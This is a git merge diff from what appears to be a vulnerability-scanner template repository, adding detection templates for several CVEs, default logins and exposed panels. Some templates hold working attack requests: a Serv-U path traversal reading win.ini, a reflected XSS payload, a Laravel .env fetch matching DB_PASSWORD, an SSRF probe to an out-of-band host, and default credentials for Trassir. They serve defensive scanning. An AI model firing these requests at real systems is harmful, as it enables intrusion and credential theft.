Merge branch 'main' into dashboard

2023-04-17 09:26:42 -04:00 · 2023-04-17 09:26:42 -04:00 · c2e2e6dbc1
parent a826a75711 760f4897b0
commit c2e2e6dbc1
77 changed files with 763 additions and 255 deletions
--- a/.new-additions
+++ b/.new-additions
@ -1,78 +1,14 @@
-cnvd/2020/CNVD-2020-26585.yaml
-cves/2013/CVE-2013-7285.yaml
-cves/2014/CVE-2014-6287.yaml
-cves/2015/CVE-2015-2196.yaml
-cves/2017/CVE-2017-9416.yaml
-cves/2019/CVE-2019-12985.yaml
-cves/2019/CVE-2019-12986.yaml
-cves/2019/CVE-2019-12987.yaml
-cves/2019/CVE-2019-12988.yaml
-cves/2019/CVE-2019-12990.yaml
-cves/2019/CVE-2019-15043.yaml
-cves/2020/CVE-2020-13379.yaml
-cves/2020/CVE-2020-26217.yaml
-cves/2020/CVE-2020-26258.yaml
-cves/2021/CVE-2021-21345.yaml
-cves/2021/CVE-2021-21351.yaml
-cves/2021/CVE-2021-22502.yaml
-cves/2021/CVE-2021-24239.yaml
-cves/2021/CVE-2021-24351.yaml
-cves/2021/CVE-2021-24666.yaml
-cves/2021/CVE-2021-29505.yaml
-cves/2021/CVE-2021-39141.yaml
-cves/2021/CVE-2021-39144.yaml
-cves/2021/CVE-2021-39146.yaml
-cves/2021/CVE-2021-39152.yaml
-cves/2022/CVE-2022-0212.yaml
-cves/2022/CVE-2022-0827.yaml
-cves/2022/CVE-2022-1058.yaml
-cves/2022/CVE-2022-21661.yaml
-cves/2022/CVE-2022-23898.yaml
-cves/2022/CVE-2022-2462.yaml
-cves/2022/CVE-2022-25125.yaml
-cves/2022/CVE-2022-2627.yaml
-cves/2022/CVE-2022-2756.yaml
-cves/2022/CVE-2022-3982.yaml
-cves/2022/CVE-2022-4140.yaml
-cves/2022/CVE-2022-43140.yaml
-cves/2022/CVE-2022-43769.yaml
-cves/2022/CVE-2022-45835.yaml
-cves/2022/CVE-2022-46934.yaml
-cves/2022/CVE-2022-48012.yaml
-cves/2023/CVE-2023-0552.yaml
-cves/2023/CVE-2023-0942.yaml
-cves/2023/CVE-2023-0968.yaml
-cves/2023/CVE-2023-1080.yaml
-cves/2023/CVE-2023-1177.yaml
-cves/2023/CVE-2023-24278.yaml
-cves/2023/CVE-2023-24367.yaml
-cves/2023/CVE-2023-24657.yaml
-cves/2023/CVE-2023-24733.yaml
-cves/2023/CVE-2023-24735.yaml
-cves/2023/CVE-2023-24737.yaml
-default-logins/adminer-default-login.yaml
-exposed-panels/arcgis/arcgis-services.yaml
-exposed-panels/arcgis/arcgis-tokens.yaml
-exposed-panels/fortinet/fortinet-fortimanager-panel.yaml
-exposed-panels/hestia-panel.yaml
-exposed-panels/i-mscp-panel.yaml
-exposed-panels/seagate-nas-login.yaml
-exposed-panels/sonic-wall-login.yaml
-exposed-panels/web-viewer-panel.yaml
-exposures/logs/opentsdb-status.yaml
-file/keys/github/github-outdated-key.yaml
-misconfiguration/cluster-panel.yaml
-misconfiguration/jupyter-lab-unauth.yaml
-misconfiguration/kubernetes/unauth-etcd-server.yaml
-misconfiguration/laravel-horizon-unauth.yaml
-misconfiguration/mlflow-unauth.yaml
-network/enumeration/kafka-topics-list.yaml
-ssl/kubernetes-fake-certificate.yaml
-technologies/cvsweb-detect.yaml
-technologies/kubernetes/etcd/etcd-version.yaml
-technologies/openai-plugin.yaml
-technologies/sitecore-cms.yaml
-technologies/wordpress/plugins/host-webfonts-local.yaml
-vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml
-vulnerabilities/other/pmb-xss.yaml
-vulnerabilities/wordpress/watu-xss.yaml
+cves/2017/CVE-2017-16894.yaml
+cves/2021/CVE-2021-35250.yaml
+cves/2022/CVE-2022-0864.yaml
+cves/2023/CVE-2023-27159.yaml
+default-logins/trassir/trassir-default-login.yaml
+exposed-panels/appwrite-panel.yaml
+exposed-panels/aspect-control-panel.yaml
+misconfiguration/apollo-adminservice-unauth.yaml
+misconfiguration/default-spx-key.yaml
+network/enumeration/beanstalk-service.yaml
+osint/imgbb.yaml
+osint/rubygems.yaml
+vulnerabilities/generic/cache-poisoning-xss.yaml
+vulnerabilities/huawei/huawei-firewall-lfi.yaml
--- a/cnvd/2017/CNVD-2017-03561.yaml
+++ b/cnvd/2017/CNVD-2017-03561.yaml
@ -1,23 +1,25 @@
 id: CNVD-2017-03561

 info:
-  name: Panwei eMobile - OGNL Injection
+  name: Fanwei eMobile - OGNL Injection
  author: ritikchaddha
  severity: high
-  description: Panwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
+  description: |
+    Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
  reference:
    - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
    - https://reconshell.com/vulnerability-research-list/
  metadata:
    verified: true
    fofa-query: app="泛微-eMobile"
-  tags: cnvd,cnvd2017,emobile,ognl,panwei
+  tags: cnvd,cnvd2017,emobile,ognl,fanwei

 variables:
-  num1: "9999"
-  num2: "5555"
+  num1: "{{rand_int(800000, 999999)}}"
+  num2: "{{rand_int(800000, 999999)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"

-requests:
+http:
  - method: GET
    path:
      - "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
@ -29,7 +31,7 @@ requests:
      - type: word
        part: body
        words:
-          - '55544445'
+          - "{{result}}"

      - type: status
        status:
--- a/cves.json
+++ b/cves.json
@ -388,6 +388,7 @@
 {"ID":"CVE-2017-15944","Info":{"Name":"Palo Alto Network PAN-OS - Remote Code Execution","Severity":"critical","Description":"Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-15944.yaml"}
 {"ID":"CVE-2017-16806","Info":{"Name":"Ulterius Server \u003c 1.9.5.0 - Directory Traversal","Severity":"high","Description":"Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-16806.yaml"}
 {"ID":"CVE-2017-16877","Info":{"Name":"Nextjs \u003c2.4.1 - Local File Inclusion","Severity":"high","Description":"ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-16877.yaml"}
+{"ID":"CVE-2017-16894","Info":{"Name":"Laravel framework \u003c 5.5.21 - Infomation Disclosure","Severity":"high","Description":"In Laravel framework through 5.5.21, remote attackers can obtain sensitive information (such as externally usable passwords) via a direct request for the /.env URI. NOTE: this CVE is only about Laravel framework's writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting the .env permissions. The .env filename is not used exclusively by Laravel framework.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-16894.yaml"}
 {"ID":"CVE-2017-17043","Info":{"Name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter \"post\" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-17043.yaml"}
 {"ID":"CVE-2017-17059","Info":{"Name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-17059.yaml"}
 {"ID":"CVE-2017-17451","Info":{"Name":"WordPress Mailster \u003c=1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-17451.yaml"}
@ -1206,6 +1207,7 @@
 {"ID":"CVE-2021-34640","Info":{"Name":"WordPress Securimage-WP-Fixed \u003c=3.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-34640.yaml"}
 {"ID":"CVE-2021-34643","Info":{"Name":"WordPress Skaut Bazar \u003c1.3.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-34643.yaml"}
 {"ID":"CVE-2021-34805","Info":{"Name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","Severity":"high","Description":"FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-34805.yaml"}
+{"ID":"CVE-2021-35250","Info":{"Name":"SolarWinds Serv-U 15.3 - Directory Traversal","Severity":"high","Description":"A researcher reported a Directory Traversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-35250.yaml"}
 {"ID":"CVE-2021-35265","Info":{"Name":"MaxSite CMS Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.\"","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-35265.yaml"}
 {"ID":"CVE-2021-35336","Info":{"Name":"Tieline IP Audio Gateway \u003c=2.6.4.8 - Unauthorized Remote Admin Panel Access","Severity":"critical","Description":"Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-35336.yaml"}
 {"ID":"CVE-2021-35380","Info":{"Name":"TermTalk Server 3.24.0.2 - Local File Inclusion","Severity":"high","Description":"TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-35380.yaml"}
@ -1397,6 +1399,7 @@
 {"ID":"CVE-2022-0824","Info":{"Name":"Webmin \u003c1.990 - Improper Access Control","Severity":"high","Description":"Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-0824.yaml"}
 {"ID":"CVE-2022-0826","Info":{"Name":"WordPress WP Video Gallery \u003c=1.7.1 - SQL Injection","Severity":"critical","Description":"WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0826.yaml"}
 {"ID":"CVE-2022-0827","Info":{"Name":"Bestbooks \u003c= 2.6.3 - Unauthenticated SQLi","Severity":"critical","Description":"The Bestbooks WordPress plugin through 2.6.3 does not sanitise and escape some parameters before using them in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0827.yaml"}
+{"ID":"CVE-2022-0864","Info":{"Name":"UpdraftPlus \u003c 1.22.9 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-0864.yaml"}
 {"ID":"CVE-2022-0867","Info":{"Name":"WordPress ARPrice \u003c3.6.1 - SQL Injection","Severity":"critical","Description":"WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0867.yaml"}
 {"ID":"CVE-2022-0870","Info":{"Name":"Gogs \u003c 0.12.5 - Server Side Request Forgery","Severity":"medium","Description":"Server-Side Request Forgery (SSRF) in GitHub repository gogs/gogs prior to 0.12.5.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-0870.yaml"}
 {"ID":"CVE-2022-0885","Info":{"Name":"Member Hero \u003c=1.0.9 - Remote Code Execution","Severity":"critical","Description":"WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0885.yaml"}
@ -1665,7 +1668,7 @@
 {"ID":"CVE-2022-43140","Info":{"Name":"kkFileview v4.1.0 - Server Side Request Forgery","Severity":"high","Description":"kkFileView v4.1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. This vulnerability allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-43140.yaml"}
 {"ID":"CVE-2022-4320","Info":{"Name":"WordPress Events Calendar \u003c1.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-4320.yaml"}
 {"ID":"CVE-2022-4325","Info":{"Name":"WordPress Post Status Notifier Lite \u003c1.10.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-4325.yaml"}
-{"ID":"CVE-2022-43769","Info":{"Name":"Pentaho Server 9.3.0.0-324 - Unauthenticated RCE via SSTI","Severity":"critical","Description":"Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted downstream.\n","Classification":{"CVSSScore":"8.0"}},"file_path":"cves/2022/CVE-2022-43769.yaml"}
+{"ID":"CVE-2022-43769","Info":{"Name":"Pentaho Server 9.3.0.0-324 - Unauthenticated RCE via SSTI","Severity":"high","Description":"Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted downstream.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-43769.yaml"}
 {"ID":"CVE-2022-4447","Info":{"Name":"WordPress Fontsy \u003c=1.8.6 - SQL Injection","Severity":"critical","Description":"WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action.  An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-4447.yaml"}
 {"ID":"CVE-2022-44877","Info":{"Name":"CentOS Web Panel 7 \u003c0.9.8.1147 - Remote Code Execution","Severity":"critical","Description":"CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-44877.yaml"}
 {"ID":"CVE-2022-45362","Info":{"Name":"Paytm Payment Gateway Plugin \u003c= 2.7.0 Server Side Request Forgery (SSRF)","Severity":"high","Description":"Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-45362.yaml"}
@ -1707,6 +1710,7 @@
 {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to make a Reflected XSS on export_z3950.php endpoint via the same query parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24737.yaml"}
 {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2023/CVE-2023-26255.yaml"}
 {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2023/CVE-2023-26256.yaml"}
+{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c= 1.2.1 - Server-Side Request Forgery","Severity":"medium","Description":"Appwrite up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /v1/avatars/favicon. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2023/CVE-2023-27159.yaml"}
 {"ID":"CVE-2023-27292","Info":{"Name":"OpenCATS - Open Redirect","Severity":"medium","Description":"OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2023/CVE-2023-27292.yaml"}
 {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Google Cloud API Disclosure","Severity":"medium","Description":"If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2023/CVE-2023-27587.yaml"}
 {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software - Command Injection","Severity":"critical","Description":"OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2023/CVE-2023-28343.yaml"}
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@ -1 +1 @@
-0b8c136254be187cf0afeb350ba4ff03
+9ec05bf1343002cd20d68600e00ddfda
--- a/cves/2017/CVE-2017-16894.yaml
+++ b/cves/2017/CVE-2017-16894.yaml
@ -0,0 +1,47 @@
+id: CVE-2017-16894
+
+info:
+  name: Laravel framework < 5.5.21 - Infomation Disclosure
+  author: j4vaovo
+  severity: high
+  description: |
+    In Laravel framework through 5.5.21, remote attackers can obtain sensitive information (such as externally usable passwords) via a direct request for the /.env URI. NOTE: this CVE is only about Laravel framework's writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting the .env permissions. The .env filename is not used exclusively by Laravel framework.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894
+    - https://packetstormsecurity.com/files/cve/CVE-2017-16894
+    - http://whiteboyz.xyz/laravel-env-file-vuln.html
+    - https://twitter.com/finnwea/status/967709791442341888
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2017-16894
+    cwe-id: CWE-200
+  metadata:
+    fofa-query: app="Laravel-Framework"
+    shodan-query: Laravel-Framework
+    verified: "true"
+  tags: cve2017,laravel,exposure,packetstorm,cve
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.env"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "APP_NAME="
+          - "APP_DEBUG="
+          - "DB_PASSWORD="
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200
--- a/cves/2021/CVE-2021-21311.yaml
+++ b/cves/2021/CVE-2021-21311.yaml
@ -51,6 +51,8 @@ requests:
        part: body
        words:
          - "<title>400 - Bad Request</title>"
+          - "&lt;title&gt;400 - Bad Request&lt;/title&gt;"
+        condition: or

      - type: status
        status:
--- a/cves/2021/CVE-2021-35250.yaml
+++ b/cves/2021/CVE-2021-35250.yaml
@ -0,0 +1,42 @@
+id: CVE-2021-35250
+
+info:
+  name: SolarWinds Serv-U 15.3 - Directory Traversal
+  author: johnk3r,pdteam
+  severity: high
+  description: |
+    A researcher reported a Directory Traversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.
+  reference:
+    - https://github.com/rissor41/SolarWinds-CVE-2021-35250
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35250
+    - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US
+    - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250
+    - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-35250
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: product:"Rhinosoft Serv-U httpd"
+  tags: cve,cve2021,solarwinds,traversal
+
+requests:
+  - raw:
+      - |
+        POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        /?Command=NOOP
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "\\[(font|extension|file)s\\]"
+
+      - type: status
+        status:
+          - 401
--- a/cves/2022/CVE-2022-0864.yaml
+++ b/cves/2022/CVE-2022-0864.yaml
@ -0,0 +1,49 @@
+id: CVE-2022-0864
+
+info:
+  name: UpdraftPlus < 1.22.9 - Cross-Site Scripting
+  author: DhiyaneshDk
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/7337543f-4c2c-4365-aebf-3423e9d2f872
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0864
+    - https://wordpress.org/plugins/updraftplus
+  classification:
+    cve-id: CVE-2022-0864
+  metadata:
+    verified: "true"
+  tags: cve2022,xss,authenticated,updraftplus,wpscan,cve,wp-plugin,wp,wordpress
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(document.domain)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '</script><script>confirm(document.domain)</script>'
+          - 'updraftplus'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
--- a/cves/2022/CVE-2022-43769.yaml
+++ b/cves/2022/CVE-2022-43769.yaml
@ -3,7 +3,7 @@ id: CVE-2022-43769
 info:
  name: Hitachi Pentaho Business Analytics Server - Remote Code Execution
  author: dwbzn
-  severity: critical
+  severity: high
  description: |
    Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
  reference:
@ -15,9 +15,10 @@ info:
    cvss-score: 10.0
    cwe-id: CWE-77
    cve-id: CVE-2022-43769
+    cve-id: CVE-2022-43769
  metadata:
-    verified: "true"
    shodan-query: http.favicon.hash:1749354953
+    verified: "true"
  tags: cve,cve2022,rce,ssti,pentaho,kev

 requests:
--- a/cves/2023/CVE-2023-27159.yaml
+++ b/cves/2023/CVE-2023-27159.yaml
@ -0,0 +1,34 @@
+id: CVE-2023-27159
+
+info:
+  name: Appwrite <= 1.2.1 - Server-Side Request Forgery
+  author: DhiyaneshDk
+  severity: medium
+  description: |
+    Appwrite up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /v1/avatars/favicon. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.
+  reference:
+    - https://gist.github.com/b33t1e/43b26c31e895baf7e7aea2dbf9743a9a
+    - https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA
+  classification:
+    cve-id: CVE-2023-27159
+  metadata:
+    verified: "true"
+    shodan-query: title:"Sign In - Appwrite"
+  tags: cve,cve2023,appwrite,ssrf,oast
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: Appwrite-Server"
--- a/default-logins/trassir/trassir-default-login.yaml
+++ b/default-logins/trassir/trassir-default-login.yaml
@ -0,0 +1,53 @@
+id: trassir-default-login
+
+info:
+  name: Trassir Webview - Default Login
+  author: gtrrnr,metascan
+  severity: high
+  description: |
+    Trassir contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+  reference:
+    - https://confluence.trassir.com/display/TKB/How+to+reset+the+administrator+password+on+the+TRASSIR+NVR
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
+  metadata:
+    verified: "true"
+    shodan-query: title:"Trassir Webview"
+  tags: default-login,trassir,webview
+
+http:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+
+        username={{username}}&password={{password}}
+
+    attack: clusterbomb
+    payloads:
+      username:
+        - Admin
+      password:
+        - 12345
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success" :'
+          - '"sid" :'
+        condition: and
+        case-insensitive: true
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200
--- a/exposed-panels/appwrite-panel.yaml
+++ b/exposed-panels/appwrite-panel.yaml
@ -0,0 +1,23 @@
+id: appwrite-panel
+
+info:
+  name: Appwrite Login Panel - Detect
+  author: ritikchaddha
+  severity: info
+  description: Appwrite login panel was detected.
+  metadata:
+    verified: "true"
+    shodan-query: http.favicon.hash:-633108100
